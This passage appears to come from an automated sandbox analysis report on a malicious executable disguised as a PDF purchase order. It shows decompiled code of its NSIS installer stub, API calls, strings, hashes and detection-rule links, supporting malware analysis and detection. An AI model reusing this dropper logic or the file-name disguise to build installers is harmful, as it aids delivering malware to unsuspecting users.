						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417040; // 0x0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f050;
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

































                                                                                                                              0x00402c80
                                                                                                                              0x00402c83
                                                                                                                              0x00402c9d
                                                                                                                              0x00402ca2
                                                                                                                              0x00402cb5
                                                                                                                              0x00402cba
                                                                                                                              0x00402cc0
                                                                                                                              0x00000000
                                                                                                                              0x00402cc2
                                                                                                                              0x00402cd3
                                                                                                                              0x00402ce4
                                                                                                                              0x00402ceb
                                                                                                                              0x00402cf1
                                                                                                                              0x00402cf3
                                                                                                                              0x00402cf8
                                                                                                                              0x00402cfa
                                                                                                                              0x00402dea
                                                                                                                              0x00402dec
                                                                                                                              0x00402df1
                                                                                                                              0x00402df8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402dfe
                                                                                                                              0x00402e01
                                                                                                                              0x00402e2d
                                                                                                                              0x00402e32
                                                                                                                              0x00402e3d
                                                                                                                              0x00402e3f
                                                                                                                              0x00402e50
                                                                                                                              0x00402e6b
                                                                                                                              0x00402e71
                                                                                                                              0x00402e74
                                                                                                                              0x00402e79
                                                                                                                              0x00402e8f
                                                                                                                              0x00402e98
                                                                                                                              0x00402ea8
                                                                                                                              0x00402eba
                                                                                                                              0x00402ebf
                                                                                                                              0x00402ec4
                                                                                                                              0x00402ec7
                                                                                                                              0x00402ed0
                                                                                                                              0x00402ed4
                                                                                                                              0x00402edc
                                                                                                                              0x00402ee1
                                                                                                                              0x00402ee3
                                                                                                                              0x00402ee3
                                                                                                                              0x00402ee3
                                                                                                                              0x00402eeb
                                                                                                                              0x00402eeb
                                                                                                                              0x00402eee
                                                                                                                              0x00402eef
                                                                                                                              0x00402eef
                                                                                                                              0x00402ef2
                                                                                                                              0x00402ef4
                                                                                                                              0x00402ef4
                                                                                                                              0x00402ef4
                                                                                                                              0x00402ef7
                                                                                                                              0x00402efe
                                                                                                                              0x00402f0a
                                                                                                                              0x00402f0f
                                                                                                                              0x00000000
                                                                                                                              0x00402f0f
                                                                                                                              0x00000000
                                                                                                                              0x00402ec7
                                                                                                                              0x00000000
                                                                                                                              0x00402e7b
                                                                                                                              0x00402e09
                                                                                                                              0x00402e14
                                                                                                                              0x00402e19
                                                                                                                              0x00402e1b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402e24
                                                                                                                              0x00402e27
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402d00
                                                                                                                              0x00402d00
                                                                                                                              0x00402d00
                                                                                                                              0x00402d05
                                                                                                                              0x00402d09
                                                                                                                              0x00402d10
                                                                                                                              0x00402d15
                                                                                                                              0x00402d17
                                                                                                                              0x00402d19
                                                                                                                              0x00402d19
                                                                                                                              0x00402d21
                                                                                                                              0x00402d26
                                                                                                                              0x00402d28
                                                                                                                              0x00402e87
                                                                                                                              0x00402ec9
                                                                                                                              0x00000000
                                                                                                                              0x00402ec9
                                                                                                                              0x00402d2e
                                                                                                                              0x00402d34
                                                                                                                              0x00402db4
                                                                                                                              0x00402db8
                                                                                                                              0x00402dbb
                                                                                                                              0x00402dc0
                                                                                                                              0x00000000
                                                                                                                              0x00402db8
                                                                                                                              0x00402d41
                                                                                                                              0x00402d46
                                                                                                                              0x00402d49
                                                                                                                              0x00402d4e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402d50
                                                                                                                              0x00402d57
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402d59
                                                                                                                              0x00402d60
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402d62
                                                                                                                              0x00402d69
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402d6b
                                                                                                                              0x00402d72
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402d74
                                                                                                                              0x00402d7a
                                                                                                                              0x00402d83
                                                                                                                              0x00402d89
                                                                                                                              0x00402d8c
                                                                                                                              0x00402d8e
                                                                                                                              0x00402d94
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402d9a
                                                                                                                              0x00402d9e
                                                                                                                              0x00402da6
                                                                                                                              0x00402da6
                                                                                                                              0x00402da9
                                                                                                                              0x00402dac
                                                                                                                              0x00402dae
                                                                                                                              0x00402db0
                                                                                                                              0x00402db0
                                                                                                                              0x00000000
                                                                                                                              0x00402dae
                                                                                                                              0x00402da0
                                                                                                                              0x00402da4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402dc1
                                                                                                                              0x00402dc1
                                                                                                                              0x00402dc7
                                                                                                                              0x00402dd7
                                                                                                                              0x00402dd7
                                                                                                                              0x00402dda
                                                                                                                              0x00402de0
                                                                                                                              0x00402de2
                                                                                                                              0x00402de2
                                                                                                                              0x00000000
                                                                                                                              0x00402d00

                                                                                                                              APIs
                                                                                                                              • GetTickCount.KERNEL32 ref: 00402C86
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,00000400), ref: 00402CA2
                                                                                                                                • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,80000000,00000003), ref: 00405841
                                                                                                                                • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,80000000,00000003), ref: 00402CEB
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E32
                                                                                                                              Strings
                                                                                                                              • C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                                                              • "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" , xrefs: 00402C7F
                                                                                                                              • soft, xrefs: 00402D62
                                                                                                                              • Inst, xrefs: 00402D59
                                                                                                                              • Error launching installer, xrefs: 00402CC2
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
                                                                                                                              • C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
                                                                                                                              • Null, xrefs: 00402D6B
                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                              • String ID: "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                              • API String ID: 2803837635-2932192999
                                                                                                                              • Opcode ID: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                                                              • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                                                              • Opcode Fuzzy Hash: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                                                              • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 75%
                                                                                                                              			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, "C:\Users\hardz\AppData\Local\Temp\nscEE2E.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427("C:\Users\hardz\AppData\Local\Temp\nscEE2E.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                              0x00401734
                                                                                                                              0x0040173b
                                                                                                                              0x00401744
                                                                                                                              0x00401747
                                                                                                                              0x0040174a
                                                                                                                              0x0040174f
                                                                                                                              0x00401757
                                                                                                                              0x00401773
                                                                                                                              0x00401759
                                                                                                                              0x00401759
                                                                                                                              0x0040175a
                                                                                                                              0x0040175a
                                                                                                                              0x00401779
                                                                                                                              0x00401783
                                                                                                                              0x00401783
                                                                                                                              0x00401787
                                                                                                                              0x0040178a
                                                                                                                              0x0040178f
                                                                                                                              0x00401791
                                                                                                                              0x00401793
                                                                                                                              0x00401798
                                                                                                                              0x00401798
                                                                                                                              0x004017a3
                                                                                                                              0x004017a3
                                                                                                                              0x004017b4
                                                                                                                              0x004017b6
                                                                                                                              0x004017b6
                                                                                                                              0x004017b7
                                                                                                                              0x004017b7
                                                                                                                              0x004017ba
                                                                                                                              0x004017bd
                                                                                                                              0x004017c0
                                                                                                                              0x004017c0
                                                                                                                              0x004017c7
                                                                                                                              0x004017d6
                                                                                                                              0x004017db
                                                                                                                              0x004017de
                                                                                                                              0x004017e1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004017e3
                                                                                                                              0x004017e6
                                                                                                                              0x00401840
                                                                                                                              0x00401845
                                                                                                                              0x004015a8
                                                                                                                              0x0040265c
                                                                                                                              0x0040265c
                                                                                                                              0x0040288b
                                                                                                                              0x0040288e
                                                                                                                              0x0040288e
                                                                                                                              0x00000000
                                                                                                                              0x004017e8
                                                                                                                              0x004017ee
                                                                                                                              0x004017f9
                                                                                                                              0x00401806
                                                                                                                              0x00401811
                                                                                                                              0x00401827
                                                                                                                              0x00401827
                                                                                                                              0x0040182a
                                                                                                                              0x00000000
                                                                                                                              0x00401830
                                                                                                                              0x00401830
                                                                                                                              0x00401831
                                                                                                                              0x0040184e
                                                                                                                              0x00402894
                                                                                                                              0x00402894
                                                                                                                              0x00402894
                                                                                                                              0x00401833
                                                                                                                              0x00401833
                                                                                                                              0x00401834
                                                                                                                              0x00401492
                                                                                                                              0x0040220e
                                                                                                                              0x0040220e
                                                                                                                              0x0040220e
                                                                                                                              0x00401831
                                                                                                                              0x0040182a
                                                                                                                              0x00402896
                                                                                                                              0x0040289a
                                                                                                                              0x0040289a
                                                                                                                              0x0040185e
                                                                                                                              0x00401863
                                                                                                                              0x00401871
                                                                                                                              0x00401876
                                                                                                                              0x0040187c
                                                                                                                              0x00401880
                                                                                                                              0x00401882
                                                                                                                              0x0040188a
                                                                                                                              0x00401896
                                                                                                                              0x00401884
                                                                                                                              0x00401884
                                                                                                                              0x00401888
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00401888
                                                                                                                              0x0040189f
                                                                                                                              0x004018a5
                                                                                                                              0x004018a7
                                                                                                                              0x00000000
                                                                                                                              0x004018ad
                                                                                                                              0x004018ad
                                                                                                                              0x004018b0
                                                                                                                              0x004018c8
                                                                                                                              0x004018b2
                                                                                                                              0x004018b5
                                                                                                                              0x004018be
                                                                                                                              0x004018be
                                                                                                                              0x004018cd
                                                                                                                              0x004018d2
                                                                                                                              0x00402209
                                                                                                                              0x00000000
                                                                                                                              0x00402209
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                                                • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,hyperventilate Setup,NSIS Error), ref: 00405B73
                                                                                                                                • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                                • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                                • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                                                • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nscEE2E.tmp$C:\Users\user\AppData\Local\Temp\nscEE2E.tmp\System.dll$Call
                                                                                                                              • API String ID: 1941528284-3839482569
                                                                                                                              • Opcode ID: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                                                              • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                                                              • Opcode Fuzzy Hash: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                                                              • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423ef8; // 0x729f
					_t44 = _t31 + _t51;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}


















                                                                                                                              0x00402f1d
                                                                                                                              0x00402f27
                                                                                                                              0x00402f29
                                                                                                                              0x00402f30
                                                                                                                              0x00402f34
                                                                                                                              0x00402f3f
                                                                                                                              0x00402f3f
                                                                                                                              0x00402f47
                                                                                                                              0x00402f49
                                                                                                                              0x00402f50
                                                                                                                              0x00402f6c
                                                                                                                              0x00402f70
                                                                                                                              0x00403039
                                                                                                                              0x00403039
                                                                                                                              0x00000000
                                                                                                                              0x00402f7f
                                                                                                                              0x00402f82
                                                                                                                              0x00402f88
                                                                                                                              0x00402f8f
                                                                                                                              0x00402f92
                                                                                                                              0x00402f9b
                                                                                                                              0x00403008
                                                                                                                              0x0040300e
                                                                                                                              0x00403010
                                                                                                                              0x00403010
                                                                                                                              0x00403022
                                                                                                                              0x00403026
                                                                                                                              0x00000000
                                                                                                                              0x00403028
                                                                                                                              0x00403028
                                                                                                                              0x0040302b
                                                                                                                              0x00403031
                                                                                                                              0x00000000
                                                                                                                              0x00403031
                                                                                                                              0x00402f9d
                                                                                                                              0x00402fa0
                                                                                                                              0x00403034
                                                                                                                              0x00403034
                                                                                                                              0x00402fa6
                                                                                                                              0x00402fab
                                                                                                                              0x00402fab
                                                                                                                              0x00402fb3
                                                                                                                              0x00402fb5
                                                                                                                              0x00402fb5
                                                                                                                              0x00402fc6
                                                                                                                              0x00402fca
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402fde
                                                                                                                              0x00402fe6
                                                                                                                              0x00403004
                                                                                                                              0x0040303b
                                                                                                                              0x0040303b
                                                                                                                              0x00402fed
                                                                                                                              0x00402fed
                                                                                                                              0x00402ff0
                                                                                                                              0x00402ff3
                                                                                                                              0x00402ff6
                                                                                                                              0x00403000
                                                                                                                              0x00000000
                                                                                                                              0x00403002
                                                                                                                              0x00000000
                                                                                                                              0x00403002
                                                                                                                              0x00403000
                                                                                                                              0x00000000
                                                                                                                              0x00402fe6
                                                                                                                              0x00000000
                                                                                                                              0x00402fab
                                                                                                                              0x00402fa0
                                                                                                                              0x00402f9b
                                                                                                                              0x00402f92
                                                                                                                              0x00402f70
                                                                                                                              0x0040303c
                                                                                                                              0x00403040

                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,000303E4), ref: 00402F3F
                                                                                                                              • ReadFile.KERNELBASE(00409130,00000004,000303E4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                                                              • ReadFile.KERNELBASE(00413040,00004000,000303E4,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,000303E4), ref: 00402FC6
                                                                                                                              • WriteFile.KERNELBASE(00000000,00413040,000303E4,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,000303E4), ref: 00402FDE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Read$PointerWrite
                                                                                                                              • String ID: @0A
                                                                                                                              • API String ID: 2113905535-1363546919
                                                                                                                              • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                                              • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                                                              • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                                              • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 94%
                                                                                                                              			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x49d5c
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
